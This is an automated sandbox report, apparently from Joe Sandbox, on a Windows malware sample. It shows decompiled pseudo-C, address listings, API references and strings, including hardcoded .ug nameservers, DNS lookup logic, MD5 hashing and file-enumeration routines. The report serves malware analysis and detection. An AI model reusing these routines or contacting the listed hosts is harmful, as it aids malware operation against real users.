							_t534 = _v40;
							goto L121;
						}
						__eflags = _t555 - _t305;
						if(_t555 > _t305) {
							goto L29;
						}
						_t496 = _v40;
						_t558 = (0x2aaaaaab * (_t305 - _t555) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * (_t305 - _t555) >> 0x20 >> 2);
						__eflags = _t496 - _t533;
						if(_t496 == _t533) {
							E00415230(_t437,  &_v44, _t533, _t496);
							_t533 = _v36;
							_t496 = _v40;
						}
						_t305 = _t558 + _t558 * 2;
						_t559 = _v44 + _t305 * 8;
						__eflags = _t496;
						if(_t496 != 0) {
							 *(_t496 + 0x14) = 0xf;
							 *((intOrPtr*)(_t496 + 0x10)) = 0;
							 *_t496 = 0;
							__eflags =  *(_t559 + 0x14) - 0x10;
							if( *(_t559 + 0x14) >= 0x10) {
								 *_t496 =  *_t559;
								 *_t559 = 0;
							} else {
								_t425 =  *((intOrPtr*)(_t559 + 0x10)) + 1;
								__eflags = _t425;
								if(_t425 != 0) {
									E004205A0(_t496, _t559, _t425);
									_t496 = _v40;
									_t564 = _t564 + 0xc;
								}
							}
							 *((intOrPtr*)(_t496 + 0x10)) =  *((intOrPtr*)(_t559 + 0x10));
							_t305 =  *(_t559 + 0x14);
							 *(_t496 + 0x14) = _t305;
							 *(_t559 + 0x14) = 0xf;
							 *((intOrPtr*)(_t559 + 0x10)) = 0;
							 *_t559 = 0;
						}
						goto L37;
						L17:
						_t412 =  *_t493;
						_t493 = _t493 + 1;
						__eflags = _t412;
						if(_t412 != 0) {
							goto L17;
						} else {
							_t494 = _t493 - _t554;
							__eflags = _t494;
							_t555 = _v44;
							goto L19;
						}
					}
					_t447 = _a24;
					_t502 = _a4;
					_t430 =  >=  ? _t502 :  &_a4;
					if(( >=  ? _t502 :  &_a4)[_t542] == 0x2f) {
						__eflags = 0;
						 *((short*)(_t560 + _t542 * 2 - 0xa0a8)) = 0;
						break;
					} else {
						_t433 =  >=  ? _t502 :  &_a4;
						 *((short*)(_t560 + _t542 * 2 - 0xa0a8)) = ( >=  ? _t502 :  &_a4)[_t542];
						_t542 = _t542 + 1;
						continue;
					}
				}
				_t533 = 0;
				_v44 = 0;
				_v40 = 0;
				_v36 = 0;
				_t305 = 0;
				_v32 = 0;
				_v28 = 0;
				_v48 = 0;
				_v24 = 0;
				_v8 = 2;
				_t437 = 0;
				__eflags = 0;
				_v160 = "ns1.kriston.ug";
				_v156 = "ns2.chalekin.ug";
				_v152 = "ns3.unalelath.ug";
				_v148 = "ns4.andromath.ug";
				goto L11;
			}

0x0040dd40
0x0040dd43
0x0040dd4b
0x0040dd50
0x0040dd56
0x0040dd5d
0x0040dd62
0x0040dd63
0x0040dd64
0x0040dd65
0x0040dd6b
0x0040dd75
0x0040dd83
0x0040dd88
0x0040dd8c
0x0040dd8d
0x0040dd92
0x0040dd97
0x0040dd99
0x0040dd9d
0x0040dda0
0x0040dda0
0x0040ddac
0x0040ddb1
0x0040ddb5
0x0040ddb6
0x0040ddbb
0x0040ddc0
0x0040ddc2
0x0040ddc9
0x0040ddc9
0x0040ddd6
0x0040dde4
0x0040dde9
0x0040ddef
0x0040ddf2
0x0040ddf5
0x0040ddf7
0x0040de00
0x0040de06
0x0040de0e
0x00000000
0x00000000
0x0040de13
0x0040deea
0x0040deef
0x0040def4
0x0040def4
0x0040def6
0x0040def6
0x0040def6
0x0040df0c
0x0040df0c
0x0040df11
0x0040df16
0x0040df1a
0x0040df1d
0x0040df20
0x0040df22
0x0040dfc2
0x0040dfc2
0x0040dfc4
0x0040dfca
0x0040dfcf
0x0040dfd2
0x0040dfd2
0x0040dfd5
0x0040dfd7
0x0040dfd9
0x0040dfe0
0x0040dfe7
0x0040dfea
0x0040dfee
0x0040e00c
0x0040e00e
0x0040dff0
0x0040dff3
0x0040dff3
0x0040dff4
0x0040dffc
0x0040e001
0x0040e004
0x0040e004
0x0040dff4
0x0040e018
0x0040e01b
0x0040e01e
0x0040e021
0x0040e028
0x0040e02f
0x0040e02f
0x0040e033
0x0040e033
0x0040e036
0x0040e03a
0x0040e03e
0x0040e041
0x0040e046
0x0040e04b
0x0040e04b
0x0040e04e
0x0040e051
0x0040e051
0x0040e052
0x0040e055
0x0040dea0
0x0040dea7
0x0040dead
0x0040deaf
0x00000000
0x00000000
0x0040deb5
0x0040deba
0x00000000
0x00000000
0x0040dec3
0x0040dec7
0x0040decd
0x0040decf
0x0040ded6
0x0040dedd
0x0040dee1
0x0040dee4
0x00000000
0x0040dee6
0x0040dee6
0x00000000
0x0040dee6
0x0040dee4
0x0040e05b
0x0040e062
0x0040e067
0x0040e06b
0x0040e06c
0x0040e071
0x0040e074
0x0040e07e
0x0040e084
0x0040e087
0x0040e089
0x0040e08e
0x0040e098
0x0040e09d
0x0040e0a8
0x0040e0a8
0x0040e0aa
0x0040e0ad
0x0040e48d
0x0040e48d
0x0040e490
0x0040e492
0x0040e495
0x0040e495
0x0040e4a0
0x0040e4ae
0x0040e4bc
0x0040e4c1
0x0040e4d0
0x0040e4d6
0x0040e4d8
0x0040e557
0x0040e557
0x0040e55e
0x0040e56a
0x00000000
0x0040e4da
0x0040e4da
0x0040e4df
0x0040e4e1
0x0040e4e8
0x0040e4ef
0x0040e4f6
0x0040e4f8
0x0040e505
0x0040e50a
0x0040e50d
0x0040e511
0x0040e513
0x0040e513
0x0040e515
0x0040e523
0x0040e525
0x0040e52c
0x0040e534
0x0040e539
0x0040e539
0x0040e549
0x0040e570
0x0040e570
0x0040e578
0x0040e57f
0x0040e586
0x0040e589
0x0040e590
0x0040e596
0x0040e59c
0x0040e5a0
0x0040e5a0
0x0040e5a3
0x0040e5a6
0x0040e5a6
0x0040e5ab
0x0040e5ab
0x0040e5ad
0x0040e5af
0x0040e5af
0x0040e5b9
0x0040e5be
0x0040e5c1
0x0040e5c3
0x0040e604
0x0040e604
0x0040e607
0x0040e609
0x0040e642
0x0040e642
0x0040e646
0x0040e64b
0x0040e650
0x0040e65e
0x0040e669
0x0040e669
0x0040e60b
0x0040e60d
0x0040e60f
0x0040e639
0x0040e63a
0x0040e63f
0x00000000
0x00000000
0x00000000
0x00000000
0x0040e611
0x0040e611
0x0040e611
0x0040e615
0x0040e619
0x0040e61e
0x0040e61e
0x0040e621
0x0040e628
0x0040e62f
0x0040e632
0x0040e635
0x0040e635
0x00000000
0x0040e611
0x0040e5c5
0x0040e5c8
0x0040e5ca
0x0040e5cc
0x0040e5fb
0x0040e5fc
0x0040e601
0x00000000
0x0040e601
0x0040e5d0
0x0040e5d0
0x0040e5d4
0x0040e5d8
0x0040e5dd
0x0040e5dd
0x0040e5e0
0x0040e5e7
0x0040e5ee
0x0040e5f1
0x0040e5f4
0x0040e5f4
0x0040e5f8
0x00000000
0x0040e5f8
0x0040e592
0x00000000
0x0040e592
0x0040e4d8
0x0040e0b3
0x0040e0b5
0x0040e0b8
0x0040e0b8
0x0040e0bc
0x0040e0be
0x0040e0be
0x0040e0c1
0x0040e0c7
0x0040e0cc
0x0040e0de
0x0040e0e5
0x0040e0eb
0x0040e0ee
0x0040e0f1
0x0040e0f3
0x0040e0f9
0x0040e100
0x0040e103
0x0040e109
0x0040e10b
0x0040e111
0x0040e11e
0x0040e12d
0x0040e12d
0x0040e12f
0x0040e135
0x0040e220
0x0040e220
0x0040e223
0x0040e223
0x0040e225
0x00000000
0x00000000
0x0040e22b
0x0040e232
0x0040e239
0x0040e23c
0x0040e23e
0x0040e24e
0x0040e250
0x0040e250
0x0040e253
0x0040e253
0x0040e255
0x0040e256
0x0040e256
0x0040e25a
0x0040e25a
0x0040e25c
0x0040e25c
0x0040e261
0x0040e266
0x0040e269
0x0040e26d
0x0040e26f
0x0040e371
0x0040e371
0x0040e374
0x0040e376
0x0040e3e8
0x0040e3e8
0x0040e3ea
0x0040e3ec
0x0040e3f3
0x0040e3fa
0x0040e3fd
0x0040e401
0x0040e41c
0x0040e41e
0x0040e403
0x0040e406
0x0040e406
0x0040e407
0x0040e40f
0x0040e414
0x0040e414
0x0040e407
0x0040e428
0x0040e42e
0x0040e431
0x0040e438
0x0040e43f
0x0040e43f
0x0040e443
0x0040e443
0x0040e446
0x0040e44a
0x0040e44e
0x0040e451
0x0040e456
0x0040e45b
0x0040e45b
0x00000000
0x0040e451
0x0040e383
0x0040e38d
0x0040e390
0x00000000
0x00000000
0x0040e399
0x0040e39c
0x0040e54d
0x0040e54d
0x0040e552
0x00000000
0x0040e552
0x0040e3a5
0x0040e3bf
0x0040e3c3
0x0040e3c7
0x0040e3c9
0x0040e3cf
0x0040e3cf
0x0040e3cb
0x0040e3cb
0x0040e3cb
0x0040e3d1
0x0040e3d3
0x0040e3d3
0x0040e3da
0x0040e3e2
0x0040e3e5
0x00000000
0x0040e3e5
0x0040e275
0x0040e277
0x0040e27a
0x0040e27c
0x00000000
0x00000000
0x0040e293
0x0040e295
0x0040e298
0x0040e29a
0x0040e30a
0x0040e310
0x0040e313
0x0040e315
0x0040e31b
0x0040e322
0x0040e329
0x0040e32c
0x0040e330
0x0040e347
0x0040e349
0x0040e332
0x0040e335
0x0040e335
0x0040e336
0x0040e33b
0x0040e340
0x0040e340
0x0040e336
0x0040e352
0x0040e358
0x0040e35b
0x0040e362
0x0040e369
0x0040e369
0x00000000
0x0040e315
0x0040e2a7
0x0040e2b1
0x0040e2b4
0x00000000
0x00000000
0x0040e2bd
0x0040e2c0
0x00000000
0x00000000
0x0040e2d1
0x0040e2e1
0x0040e2e5
0x0040e2e9
0x0040e2eb
0x0040e2f1
0x0040e2f1
0x0040e2ed
0x0040e2ed
0x0040e2ed
0x0040e2f3
0x0040e2f5
0x0040e2fc
0x0040e304
0x0040e307
0x00000000
0x0040e307
0x0040e240
0x00000000
0x0040e240
0x0040e13e
0x0040e140
0x0040e140
0x0040e143
0x0040e146
0x0040e150
0x0040e150
0x0040e152
0x0040e158
0x0040e15a
0x0040e15a
0x0040e160
0x0040e160
0x0040e162
0x0040e163
0x0040e163
0x0040e167
0x0040e167
0x0040e169
0x0040e169
0x0040e16d
0x0040e16f
0x0040e176
0x0040e176
0x0040e171
0x0040e171
0x0040e171
0x0040e179
0x0040e17d
0x0040e180
0x0040e182
0x0040e1e0
0x0040e1e0
0x0040e1e2
0x0040e1eb
0x0040e1ed
0x0040e1ed
0x0040e1ed
0x0040e1e4
0x0040e1e4
0x0040e1e4
0x0040e1f0
0x00000000
0x0040e184
0x0040e184
0x0040e184
0x0040e187
0x0040e1a1
0x0040e1a1
0x0040e1a4
0x0040e1da
0x0040e1da
0x0040e1da
0x0040e1dc
0x0040e1dc
0x0040e1de
0x0040e1f2
0x0040e1f2
0x0040e1fd
0x0040e244
0x0040e247
0x0040e249
0x00000000
0x0040e249
0x00000000
0x0040e1fd
0x00000000
0x0040e1de
0x0040e1a6
0x0040e1a8
0x0040e1aa
0x0040e1d3
0x0040e1d3
0x0040e1d5
0x00000000
0x0040e1d5
0x0040e1ac
0x0040e1af
0x00000000
0x00000000
0x0040e1b4
0x0040e1b7
0x00000000
0x00000000
0x0040e1b9
0x0040e1bc
0x00000000
0x00000000
0x0040e1c1
0x0040e1c4
0x00000000
0x00000000
0x0040e1c6
0x0040e1c9
0x00000000
0x00000000
0x0040e1cb
0x0040e1ce
0x0040e1d1
0x00000000
0x00000000
0x00000000
0x0040e1d1
0x0040e190
0x0040e192
0x0040e194
0x00000000
0x00000000
0x0040e196
0x0040e199
0x0040e19c
0x0040e19c
0x0040e19f
0x00000000
0x00000000
0x00000000
0x0040e19f
0x00000000
0x0040e190
0x0040e182
0x0040e154
0x00000000
0x0040e1ff
0x0040e205
0x0040e206
0x0040e209
0x0040e20c
0x0040e20f
0x0040e211
0x0040e214
0x0040e214
0x0040e21d
0x00000000
0x0040e45e
0x0040e461
0x0040e463
0x0040e466
0x0040e466
0x0040e100
0x0040e474
0x0040e475
0x0040e478
0x0040e47b
0x0040e47e
0x0040e47e
0x0040e487
0x0040e48a
0x00000000
0x0040e48a
0x0040df28
0x0040df2a
0x00000000
0x00000000
0x0040df3b
0x0040df46
0x0040df48
0x0040df4a
0x0040df50
0x0040df55
0x0040df58
0x0040df58
0x0040df5e
0x0040df61
0x0040df64
0x0040df66
0x0040df6c
0x0040df73
0x0040df7a
0x0040df7d
0x0040df81
0x0040df9b
0x0040df9d
0x0040df83
0x0040df86
0x0040df86
0x0040df87
0x0040df8c
0x0040df91
0x0040df94
0x0040df94
0x0040df87
0x0040dfa6
0x0040dfa9
0x0040dfac
0x0040dfaf
0x0040dfb6
0x0040dfbd
0x0040dfbd
0x00000000
0x0040df00
0x0040df00
0x0040df02
0x0040df03
0x0040df05
0x00000000
0x0040df07
0x0040df07
0x0040df07
0x0040df09
0x00000000
0x0040df09
0x0040df05
0x0040de19
0x0040de1f
0x0040de25
0x0040de2d
0x0040de47
0x0040de49
0x00000000
0x0040de2f
0x0040de35
0x0040de3c
0x0040de44
0x00000000
0x0040de44
0x0040de2d
0x0040de53
0x0040de55
0x0040de58
0x0040de5b
0x0040de5e
0x0040de60
0x0040de63
0x0040de66
0x0040de69
0x0040de6c
0x0040de70
0x0040de70
0x0040de72
0x0040de7c
0x0040de86
0x0040de90
0x00000000

APIs

_wcsstr.LIBCMT ref: 0040DD8D
_wcsstr.LIBCMT ref: 0040DDB6
_memset.LIBCMT ref: 0040DDE4
lstrlenW.KERNEL32(?), ref: 0040DE0A
gethostbyname.WS2_32(00500134), ref: 0040DEA7
inet_ntoa.WS2_32(?), ref: 0040DEC7

Part of subcall function 0044F26C: std::exception::exception.LIBCMT ref: 0044F27F
Part of subcall function 0044F26C: __CxxThrowException@8.LIBCMT ref: 0044F294
Part of subcall function 0044F26C: std::exception::exception.LIBCMT ref: 0044F2AD
Part of subcall function 0044F26C: __CxxThrowException@8.LIBCMT ref: 0044F2C2
Part of subcall function 0044F26C: std::regex_error::regex_error.LIBCPMT ref: 0044F2D4
Part of subcall function 0044F26C: __CxxThrowException@8.LIBCMT ref: 0044F2E2
Part of subcall function 0044F26C: std::exception::exception.LIBCMT ref: 0044F2FB
Part of subcall function 0044F26C: __CxxThrowException@8.LIBCMT ref: 0044F310

_memmove.LIBCMT ref: 0040DF8C
_memmove.LIBCMT ref: 0040DFFC
_wcsstr.LIBCMT ref: 0040E06C
LocalAlloc.KERNEL32(00000040,00000008), ref: 0040E07E
inet_addr.WS2_32(?), ref: 0040E0C1
DnsQuery_W.DNSAPI(?,00000002,00000002,?,?,00000000), ref: 0040E0E5
inet_ntoa.WS2_32(?), ref: 0040E103
_memmove.LIBCMT ref: 0040E33B
_memmove.LIBCMT ref: 0040E40F
LocalFree.KERNEL32(?), ref: 0040E495
DnsFree.DNSAPI(?,00000001), ref: 0040E4A0
_memset.LIBCMT ref: 0040E4BC
lstrcpyW.KERNEL32 ref: 0040E4D0
lstrcatW.KERNEL32(?,00000000), ref: 0040E523
lstrcatW.KERNEL32(?,?), ref: 0040E549
lstrcatW.KERNEL32(?,?), ref: 0040E56A

Strings

ns1.kriston.ug, xrefs: 0040DE72
ns4.andromath.ug, xrefs: 0040DE90
invalid string position, xrefs: 0040DEEA
vector<T> too long, xrefs: 0040E54D
http://, xrefs: 0040DD83, 0040E4CA
ns3.unalelath.ug, xrefs: 0040DE86
https://, xrefs: 0040DDAC
ns2.chalekin.ug, xrefs: 0040DE7C

Memory Dump Source

Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd

Yara matches

Similarity

API ID: Exception@8Throw_memmove$_wcsstrlstrcatstd::exception::exception$FreeLocal_memsetinet_ntoa$AllocQuery_gethostbynameinet_addrlstrcpylstrlenstd::regex_error::regex_error
String ID: http://$https://$invalid string position$ns1.kriston.ug$ns2.chalekin.ug$ns3.unalelath.ug$ns4.andromath.ug$vector<T> too long
API String ID: 2428799424-3661121819
Opcode ID: b5098284881af2f016dff51b4d469be074dfe0eb5f9feb8c37e34c07e0411b24
Instruction ID: d0e64e8ea33e45a7fb560775d2837a96188487c5265d8965212a1f6c8b2ea466
Opcode Fuzzy Hash: b5098284881af2f016dff51b4d469be074dfe0eb5f9feb8c37e34c07e0411b24
Instruction Fuzzy Hash: AA52E071A002199FCF24CFA9C880BAEBBF1BF44304F14897EE805AB381D7799955CB95

Uniqueness

Uniqueness Score: -1.00%

Function 00410FC0 Relevance: 33.4, APIs: 18, Strings: 1, Instructions: 149
encryptionstringCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E00410FC0(CHAR* __ecx, CHAR** __edx) {
				int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				int _v28;
				long* _v32;
				int _v36;
				char _v40;
				char _v44;
				int _v48;
				char _v52;
				char _v56;
				char _v68;
				void* __ebx;
				void* __edi;
				long** _t40;
				int* _t41;
				int _t42;
				char _t44;
				char _t50;
				void* _t72;
				CHAR** _t73;
				void* _t80;
				int _t81;
				void* _t83;
				CHAR* _t84;
				intOrPtr* _t85;
				void* _t87;
				intOrPtr _t89;
				intOrPtr _t90;
				void* _t92;
				void* _t93;

				_t79 = __edx;
				 *[fs:0x0] = _t89;
				_t90 = _t89 - 0x34;
				_v20 = _t90;
				_t40 =  &_v32;
				_t73 = __edx;
				_v32 = 0;
				_t84 = __ecx;
				_v28 = 0;
				_v36 = 0;
				_v8 = 0;
				__imp__CryptAcquireContextW(_t40, 0, 0, 1, 0xf0000000, _t80, _t83, _t72,  *[fs:0x0], 0x4cabe0, 0xffffffff);
				if(_t40 == 0) {
					_v40 = _t40;
					E00430ECA( &_v40, 0x5085b8);
				}
				_t41 =  &_v28;
				__imp__CryptCreateHash(_v32, 0x8003, 0, 0, _t41);
				if(_t41 == 0) {
					_v44 = _t41;
					E00430ECA( &_v44, 0x5085b8);
				}
				_t42 = lstrlenA(_t84);
				__imp__CryptHashData(_v28, _t84, _t42, 0);
				if(_t42 == 0) {
					_v48 = _t42;
					E00430ECA( &_v48, 0x5085b8);
				}
				_t85 = __imp__CryptGetHashParam;
				_v24 = 0;
				_t44 =  *_t85(_v28, 2, 0,  &_v24, 0);
				_t98 = _t44;
				if(_t44 == 0) {
					_v52 = _t44;
					E00430ECA( &_v52, 0x5085b8);
				}
				_t81 = E00420BE4(_t73, _t80, _t98, _v24 + 1);
				_v36 = _t81;
				E0042B420(_t81, 0, _v24 + 1);
				_t92 = _t90 + 0x10;
				_t50 =  *_t85(_v28, 2, _t81,  &_v24, 0);
				if(_t50 == 0) {
					_v56 = _t50;
					E00430ECA( &_v56, 0x5085b8);
				}
				 *_t73 = E00420C62(_t73, _t79, _t81, 0x14 + _v24 * 2);
				E0042B420(_t52, 0, 0x14 + _v24 * 2);
				_t87 = 0;
				_t93 = _t92 + 0x10;
				if(_v24 > 0) {
					do {
						E004204A6( &_v68, "%.2X",  *(_t87 + _t81) & 0x000000ff);
						_t93 = _t93 + 0xc;
						lstrcatA( *_t73,  &_v68);
						_t87 = _t87 + 1;
					} while (_t87 < _v24);
				}
				E00422110(_t81);
				__imp__CryptDestroyHash(_v28);
				CryptReleaseContext(_v32, 0);
				 *[fs:0x0] = _v16;
				return 1;
			}

0x00410fc0
0x00410fd1
0x00410fd8
0x00410fde
0x00410fe1
0x00410ff0
0x00410ff2
0x00410ff9
0x00410ffb
0x00411002
0x00411009
0x00411010
0x00411018
0x0041101a
0x00411026
0x00411026
0x0041102b
0x0041103b
0x00411043
0x00411045
0x00411051
0x00411051
0x00411059
0x00411064
0x0041106c
0x0041106e
0x0041107a
0x0041107a
0x0041107f
0x00411092
0x00411099
0x0041109b
0x0041109d
0x0041109f
0x004110ab
0x004110ab
0x004110c1
0x004110c3
0x004110ca
0x004110cf
0x004110de
0x004110e2
0x004110e4
0x004110f0
0x004110f0
0x00411109
0x0041110b
0x00411110
0x00411112
0x00411118
0x00411120
0x0041112e
0x00411133
0x0041113c
0x00411142
0x00411143
0x00411120
0x00411149
0x00411154
0x0041115f
0x0041116a
0x00411177

APIs

CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 00411010
__CxxThrowException@8.LIBCMT ref: 00411026

Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F

CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 0041103B
__CxxThrowException@8.LIBCMT ref: 00411051
lstrlenA.KERNEL32(?,00000000), ref: 00411059
CryptHashData.ADVAPI32(00000000,?,00000000,?,00000000), ref: 00411064
__CxxThrowException@8.LIBCMT ref: 0041107A
CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000,?,00000000,?,00000000), ref: 00411099
__CxxThrowException@8.LIBCMT ref: 004110AB
_memset.LIBCMT ref: 004110CA
CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 004110DE
__CxxThrowException@8.LIBCMT ref: 004110F0
_malloc.LIBCMT ref: 00411100
_memset.LIBCMT ref: 0041110B
_sprintf.LIBCMT ref: 0041112E
lstrcatA.KERNEL32(?,?), ref: 0041113C
CryptDestroyHash.ADVAPI32(00000000), ref: 00411154
CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 0041115F

Strings

%.2X, xrefs: 00411128

Memory Dump Source

Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd

Yara matches

Similarity

API ID: Crypt$Exception@8HashThrow$ContextParam_memset$AcquireCreateDataDestroyExceptionRaiseRelease_malloc_sprintflstrcatlstrlen
String ID: %.2X
API String ID: 2451520719-213608013
Opcode ID: 81f91925b231181d7910d994450bf62fd2f5d2feca906d01a1321c20b071e5ae
Instruction ID: afcee35d8fffc0279d29cc69f214b0122642615a52b78f57353c1cfd92a6c2ef
Opcode Fuzzy Hash: 81f91925b231181d7910d994450bf62fd2f5d2feca906d01a1321c20b071e5ae
Instruction Fuzzy Hash: 92516171E40219BBDB10DBE5DC46FEFBBB8FB08704F14012AFA05B6291D77959018BA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040F730 Relevance: 29.2, APIs: 19, Instructions: 732
COMMONCrypto

Download Yara Rule

C-Code - Quality: 78%

			E0040F730(intOrPtr __ecx, signed int __edx, char _a4, intOrPtr _a24, intOrPtr _a28, char _a32) {
				signed int _v8;
				intOrPtr _v16;
				char _v17;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				char _v48;
				void* _v52;
				intOrPtr _v56;
				signed int _v60;
				signed int _v64;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				WCHAR* _v92;
				short _v104;
				signed int _v108;
				signed int _v112;
				char _v128;
				signed int _v132;
				signed int _v136;
				short _v152;
				char _v156;
				signed int _v160;
				signed int _v164;
				short _v180;
				intOrPtr _v184;
				char _v204;
				struct _WIN32_FIND_DATAW _v796;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t305;
				intOrPtr _t315;
				WCHAR* _t322;
				void* _t323;
				void* _t326;
				signed int _t330;
				signed int _t331;
				int _t333;
				signed int _t335;
				signed int _t336;
				intOrPtr _t340;
				intOrPtr _t346;
				intOrPtr* _t348;
				void* _t349;
				void* _t352;
				intOrPtr* _t354;
				void* _t355;
				intOrPtr* _t356;
				void* _t357;
				void* _t374;
				signed int _t380;
				WCHAR* _t381;
				WCHAR* _t392;
				WCHAR* _t394;
				void* _t451;
				void* _t457;
				signed int _t458;
				signed int _t460;
				WCHAR* _t461;
				intOrPtr _t462;
				intOrPtr _t463;
				void* _t464;
				intOrPtr* _t467;
				signed int _t469;
				intOrPtr* _t472;
				signed int _t474;
				char* _t481;
				char* _t482;
				intOrPtr* _t484;
				signed int _t486;
				intOrPtr* _t488;
				short* _t494;
				signed int _t497;
				signed int _t500;
				WCHAR* _t501;
				short* _t502;
				signed int _t507;
				intOrPtr* _t515;
				void* _t517;
				void* _t518;
				void* _t519;
				intOrPtr _t523;
				intOrPtr _t524;
				signed int _t525;
				signed int _t528;
				WCHAR* _t529;
				intOrPtr _t531;
				void* _t537;
				signed int* _t538;
				void* _t540;
				intOrPtr* _t541;
				intOrPtr* _t542;
				WCHAR* _t543;
				short _t544;
				intOrPtr _t545;
				void* _t546;
				void* _t547;
				short* _t549;
				void* _t550;
				short* _t551;

				_push(0xffffffff);
				_push(0x4cab09);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t545;
				_t546 = _t545 - 0x30c;
				_t456 = __edx;
				_v56 = __ecx;
				_v24 = __edx;
				_v8 = 0;
				E00411AB0();
				_t528 = 0;
				_t537 = (0x2aaaaaab * ( *((intOrPtr*)(__edx + 4)) -  *__edx) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * ( *((intOrPtr*)(__edx + 4)) -  *__edx) >> 0x20 >> 2);
				_v52 = _t537;
				if(_t537 == 0) {
					L15:
					_v108 = 7;
					_v112 = 0;
					_v128 = 0;
					_v8 = 3;
					_push(0xffffffff);
					_v64 = 0;
					_v80 = 0;
					_v60 = 7;
					E00414690(_t456,  &_v80,  &_a4, 0);
					_v8 = 4;
					_t457 = PathFindFileNameW;
					_t302 =  >=  ? _v80 :  &_v80;
					_t515 = PathFindFileNameW( >=  ? _v80 :  &_v80);
					_v132 = 7;
					_v136 = 0;
					_v152 = 0;
					if( *_t515 != 0) {
						_t467 = _t515;
						_t77 = _t467 + 2; // 0x2
						_t537 = _t77;
						do {
							_t305 =  *_t467;
							_t467 = _t467 + 2;
						} while (_t305 != 0);
						_t469 = _t467 - _t537 >> 1;
						goto L24;
					} else {
						_t469 = 0;
						L24:
						_push(_t469);
						E00415C10(_t457,  &_v152, _t528, _t537, _t515);
						_v8 = 5;
						_t538 = E00413520( &_v80,  &_v48, 0, _v64 - _v136);
						if( &_v80 != _t538) {
							if(_v60 >= 8) {
								L00422587(_v80);
								_t546 = _t546 + 4;
							}
							_v60 = 7;
							_v64 = 0;
							_v80 = 0;
							if(_t538[5] >= 8) {
								_v80 =  *_t538;
								 *_t538 = 0;
							} else {
								_t430 = _t538[4] + 1;
								if(_t538[4] + 1 != 0) {
									E004205A0( &_v80, _t538, _t430 + _t430);
									_t546 = _t546 + 0xc;
								}
							}
							_v64 = _t538[4];
							_v60 = _t538[5];
							_t538[5] = 7;
							_t538[4] = 0;
							 *_t538 = 0;
						}
						if(_v28 >= 8) {
							L00422587(_v48);
							_t546 = _t546 + 4;
						}
						_t529 = 0;
						while(_v64 != 0 || _v136 != 0) {
							_t529 =  &(_t529[0]);
							_t313 =  >=  ? _v80 :  &_v80;
							_t515 = PathFindFileNameW( >=  ? _v80 :  &_v80);
							if( *_t515 != 0) {
								_t472 = _t515;
								_t107 = _t472 + 2; // 0x2
								_t538 = _t107;
								do {
									_t315 =  *_t472;
									_t472 = _t472 + 2;
								} while (_t315 != 0);
								_t474 = _t472 - _t538 >> 1;
								L42:
								_push(_t474);
								E00415C10(_t457,  &_v152, _t529, _t538, _t515);
								_t538 = E00413520( &_v80,  &_v48, 0, _v64 - _v136);
								if( &_v80 != _t538) {
									if(_v60 >= 8) {
										L00422587(_v80);
										_t546 = _t546 + 4;
									}
									_v60 = 7;
									_v64 = 0;
									_v80 = 0;
									if(_t538[5] >= 8) {
										_v80 =  *_t538;
										 *_t538 = 0;
									} else {
										_t418 = _t538[4] + 1;
										if(_t538[4] + 1 != 0) {
											E004205A0( &_v80, _t538, _t418 + _t418);
											_t546 = _t546 + 0xc;
										}
									}
									_v64 = _t538[4];
									_v60 = _t538[5];
									_t538[5] = 7;
									_t538[4] = 0;
									 *_t538 = 0;
								}
								if(_v28 >= 8) {
									L00422587(_v48);
									_t546 = _t546 + 4;
								}
								continue;
							}
							_t474 = 0;
							goto L42;
						}
						if(_t529 > 3) {
							L73:
							_t322 = E00417140( &_v104,  &_a4, "*");
							_t547 = _t546 + 4;
							if(_t322[0xa] >= 8) {
								_t322 =  *_t322;
							}
							_t323 = FindFirstFileW(_t322,  &_v796);
							_v52 = _t323;
							if(_v84 >= 8) {
								L00422587(_v104);
								_t323 = _v52;
								_t547 = _t547 + 4;
							}
							_v84 = 7;
							_t458 = 0;
							_v88 = 0;
							_v104 = 0;
							_v24 = 0;
							if(_t323 == 0xffffffff) {
								L139:
								if(_v132 >= 8) {
									L00422587(_v152);
									_t547 = _t547 + 4;
								}
								_v132 = 7;
								_v136 = 0;
								_v152 = 0;
								if(_v60 >= 8) {
									L00422587(_v80);
									_t547 = _t547 + 4;
								}
								_v60 = 7;
								_v64 = 0;
								_v80 = 0;
								if(_v108 >= 8) {
									L00422587(_v128);
									_t547 = _t547 + 4;
								}
								_t326 = 0;
								_v108 = 7;
								_v112 = 0;
								_v128 = 0;
								goto L146;
							} else {
								_t540 = _v52;
								do {
									_t481 = ".";
									_t330 =  &(_v796.cFileName);
									while(1) {
										_t517 =  *_t330;
										if(_t517 !=  *_t481) {
											break;
										}
										if(_t517 == 0) {
											L84:
											_t331 = 0;
											L86:
											if(_t331 == 0) {
												goto L137;
											}
											_t482 = L"..";
											_t335 =  &(_v796.cFileName);
											while(1) {
												_t518 =  *_t335;
												if(_t518 !=  *_t482) {
													break;
												}
